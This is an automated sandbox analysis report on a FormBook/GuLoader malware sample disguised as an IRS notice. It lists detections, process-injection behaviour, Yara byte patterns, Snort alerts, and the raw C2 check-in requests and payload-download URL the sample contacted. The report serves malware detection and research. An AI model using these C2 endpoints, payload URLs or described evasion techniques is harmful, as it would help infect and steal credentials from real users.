Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report IRS Notice Letter pdf document.exe

Overview

General Information

Sample Name:IRS Notice Letter pdf document.exe
Analysis ID:338078
MD5:3fc4d64f320d7fae4bb46f6a735ab853
SHA1:b77666ebd649350f21ee41e0e902c9b95e008e3c
SHA256:ec8b3d104a7fc416aab07329a5f0ecab1b7fd181ffbd2d7ac31af51e532add07

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • IRS Notice Letter pdf document.exe (PID: 6092 cmdline: 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe' MD5: 3FC4D64F320D7FAE4BB46F6A735AB853)
    • IRS Notice Letter pdf document.exe (PID: 3788 cmdline: 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe' MD5: 3FC4D64F320D7FAE4BB46F6A735AB853)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 2860 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 4972 cmdline: /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.1022334778.0000000005467000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x3a74:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 15 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: CMSTP Execution Process CreationShow sources
      Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe', CommandLine: /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 2860, ProcessCommandLine: /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe', ProcessId: 4972

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: IRS Notice Letter pdf document.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: Binary string: cmstp.pdbGCTL source: IRS Notice Letter pdf document.exe, 00000001.00000003.750269972.000000000093F000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.730789316.0000000005A00000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: IRS Notice Letter pdf document.exe, 00000001.00000002.755014575.000000001E210000.00000040.00000001.sdmp, cmstp.exe, 00000003.00000002.1021841767.0000000004F30000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: IRS Notice Letter pdf document.exe, cmstp.exe
      Source: Binary string: cmstp.pdb source: IRS Notice Letter pdf document.exe, 00000001.00000003.750269972.000000000093F000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.730789316.0000000005A00000.00000002.00000001.sdmp
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop esi

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49735 -> 172.67.209.95:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49735 -> 172.67.209.95:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49735 -> 172.67.209.95:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49736 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49736 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49736 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 147.255.30.94:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 147.255.30.94:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 147.255.30.94:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49738 -> 153.126.209.136:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49738 -> 153.126.209.136:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49738 -> 153.126.209.136:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49739 -> 216.58.207.179:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49739 -> 216.58.207.179:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49739 -> 216.58.207.179:80
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.emuprising.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.myaarpdentalpln.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=kPRwpjmi7xHhdB/QktvvK7WyLyDr49juN0w/BSnfKghxj4qCtVdYSmPoUBccxdfkW2C+&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.alessandrabortolussi.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=29jYSSE1VYVkBCRV1XAvE7TBMmL4MadGzLcVh0Ks/tFMQ0j4Ha2R4yorJjHtPNwOuGsI&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.kobumsnetwork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=GzMG1eSemGLMBHrXmbkE5oZCgXo7nbeyHhmTYulGjAFIODDsopduu5ndU/Um1KPjDO6l&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.rednbot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=fd7Pr27tD73tirRUHLPhwKiuhRBsBtIJKGnPU16/EYze1BREDS5LbMsrasNXGEl7bB1Y&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.aksaystudios.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.aizimov.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=tK5SHJ/B9VkSEfSQE3soaE4uMhY2LrE6ZvvxVQcBFq9KYH6DfuOZHLVl1n1LVl7A3A7r&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.thebuzztraders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.emuprising.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
      Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
      Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
      Source: Joe Sandbox ViewASN Name: SAKURA-ASAKURAInternetIncJP SAKURA-ASAKURAInternetIncJP
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: global trafficHTTP traffic detected: GET /vc/xdark_GOaIsqF182.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: adojetson.comCache-Control: no-cache
      Source: C:\Windows\explorer.exeCode function: 2_2_04DBA302 getaddrinfo,setsockopt,recv,
      Source: global trafficHTTP traffic detected: GET /vc/xdark_GOaIsqF182.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: adojetson.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.emuprising.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.myaarpdentalpln.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=kPRwpjmi7xHhdB/QktvvK7WyLyDr49juN0w/BSnfKghxj4qCtVdYSmPoUBccxdfkW2C+&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.alessandrabortolussi.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=29jYSSE1VYVkBCRV1XAvE7TBMmL4MadGzLcVh0Ks/tFMQ0j4Ha2R4yorJjHtPNwOuGsI&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.kobumsnetwork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=GzMG1eSemGLMBHrXmbkE5oZCgXo7nbeyHhmTYulGjAFIODDsopduu5ndU/Um1KPjDO6l&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.rednbot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=fd7Pr27tD73tirRUHLPhwKiuhRBsBtIJKGnPU16/EYze1BREDS5LbMsrasNXGEl7bB1Y&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.aksaystudios.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.aizimov.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=tK5SHJ/B9VkSEfSQE3soaE4uMhY2LrE6ZvvxVQcBFq9KYH6DfuOZHLVl1n1LVl7A3A7r&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.thebuzztraders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1Host: www.emuprising.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: adojetson.com
      Source: IRS Notice Letter pdf document.exe, 00000001.00000002.751120614.0000000000562000.00000040.00000001.sdmpString found in binary or memory: http://adojetson.com/vc/xdark_GOaIsqF182.bin
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 00000002.00000002.1022320807.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000002.00000000.737440105.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: cmstp.exe, 00000003.00000002.1022387283.00000000055E2000.00000004.00000001.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/popper.js
      Source: cmstp.exe, 00000003.00000002.1022387283.00000000055E2000.00000004.00000001.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.5.1.slim.min.js
      Source: cmstp.exe, 00000003.00000002.1022387283.00000000055E2000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB3EB2 OpenClipboard,

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.1022334778.0000000005467000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.1021594863.000000000322D000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Executable has a suspicious name (potential lure to open the executable)Show sources
      Source: IRS Notice Letter pdf document.exeStatic file information: Suspicious name
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: IRS Notice Letter pdf document.exe
      Source: initial sampleStatic PE information: Filename: IRS Notice Letter pdf document.exe
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D34AF NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D4BFA NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D0840 EnumWindows,NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8FAC NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9209 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9235 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9229 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9226 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9254 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9241 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D926A NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9295 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D528E NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9289 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D92BD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D92B4 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D92A1 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D92DD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D92D5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D92C9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D92F5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D92E9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D931D NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2317 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9311 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9305 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9334 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9356 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9345 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D936E NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9398 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9381 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D93A9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D93DD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D93FD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D93F4 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9019 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D5010 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9010 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9031 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9025 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9055 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D2057 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9049 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9040 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9075 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9069 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9061 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D909D NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9091 NtResumeThread,
